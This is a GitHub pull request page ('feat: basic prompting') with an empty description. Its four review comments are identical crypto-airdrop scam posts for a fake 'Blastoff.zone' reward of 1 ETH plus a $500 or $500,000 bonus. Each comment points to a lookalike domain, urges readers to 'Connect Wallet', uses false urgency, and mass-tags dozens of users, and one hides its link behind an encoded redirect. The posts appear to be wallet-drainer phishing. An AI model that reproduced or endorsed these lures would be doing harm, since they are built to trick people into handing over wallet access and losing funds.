### PR TITLE
feat: basic prompting

### PR DESCRIPTION
**Pull request by Pet3ris**

### CODE REVIEW

**Comment by nguyenvuonghlnb** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
nuts-rice, @franchb, @esp10mm, @mul1sh, @TRkizaki, @thedevbirb, @kidmam, @GrandGarcon, @nyuta01, @danBamikiya, @baajarmeh, @jolestar, @Rjected, @tarvos21, @jpzk, @HegelXu, @r-tom90, @Jim8y, @rakita, @fubuloubu, @jdj1027, @guotie, @randazzojael, @legua25, @fgimenez, @devblixt, @iFrostizz, @sebastiantf, @forestlioooooo, @seyedhanaee, @lunarpulse, @henry-hz, @0xAdil, @piavgh, @elohffa, @revoltez, @zhubby, @skvorn, @kiloonen, @sing1ee, @alex-fang, @vaniisgh, @andeya, @0xKaso, @MittWillson, @ImJeremyHe, @Ben-Rey, @hartex, @royswale, @purofle

**Comment by Deepsvyas** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
0xbitboy, @ehinkla, @miguelmtzinf, @Enigmacode69, @TylersTech2020, @npjd, @joedoeslapking, @maddefientist, @vio-codes, @hero5512, @a-covar, @0xksure, @0xYYY, @amo17, @ryom0624, @shikhardb, @ahmedali8, @ekrenzke, @curtis-gross, @bitcoin4cashqc, @dfsousa, @oniswap, @donutonion, @Ferret-san, @scilla, @lippytm, @SPIRY-RO, @kozy0810, @TinkerGoblin, @a180024, @jeromeku, @FlorianMgs, @crypto-steve-ng, @beardthelion, @0xNeuro, @mstallmo, @wpank, @tmxlo, @holy-motors, @Evalir, @mooonly, @zhengger, @asymptotick, @Ants518, @ByteSecurity, @lajosdeme, @xinxianren, @agnosticlines, @naelob, @shenhcs

**Comment by SDH-IT-HO** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
felipeasf, @Pybast, @thumai883699, @bimhud, @nvnamsss, @Coffeemaniac, @lucagiorgino, @gopalindians, @hacker-DOM, @jackson1984, @xosdy, @time1010820, @nhule392093, @miguelCyclone, @glenrage, @avenbreaks, @loxadim, @vejin, @ahimthedream, @nikrasiya, @0xtulaoda, @mrrohit1, @Bertha7179, @Kingfisher102, @elohffa, @elberman, @andrewrchen05, @bychen28, @ConnorCHN, @BOGdane8, @bebensiganteng, @akhoshrozeh, @KRDecad3, @urbste, @JWMatheo, @j4w3ny, @Ramghimirecr7, @dukejones, @colus001, @FernandoFH, @dataset777, @MarioJuniorPro, @PedroDnT, @kl521516, @paolomarin, @liushooter, @helldoodle-dev, @cpxPratik, @mkoistinen, @AtHaRv420

**Comment by masa2el** [comment]
[Banner](http://darksouls2.wikidot.com/%0a/connect.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](http://darksouls2.wikidot.com/%0a/connect.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
jkcomment, @DanTehrani, @tomjrtsmith, @HHK-ETH, @Heng30, @Michael-A-Heuer, @JonathanAmenechi, @woogenius, @iamazy, @dtr0x, @logan272, @francomendoza, @merlox, @0xKoda, @wagmiwiz, @alice061579proton, @mrkaurelius, @0xAr0k, @Bapi-Reddy, @2020-io, @FWangZil, @cliff0412, @guirkgumbo, @ofofofofo, @watano, @amir-yaghoubi, @gregdhill, @ahmadkaouk, @mempooler, @ytfei, @borneygit, @Gilgamesh-818, @kaiweicai, @Vishal-Isharani, @single9, @danmandel, @skundu42, @pcaversaccio, @Ubisoft-potato, @prylypko, @girish979, @wdcs-hemanthBhushan, @Kengyen, @HoangTuan110, @coopbri, @quietude0x, @XinyuCRO, @d9608m, @rounin-rp, @yk-saito

**Pull request merged**
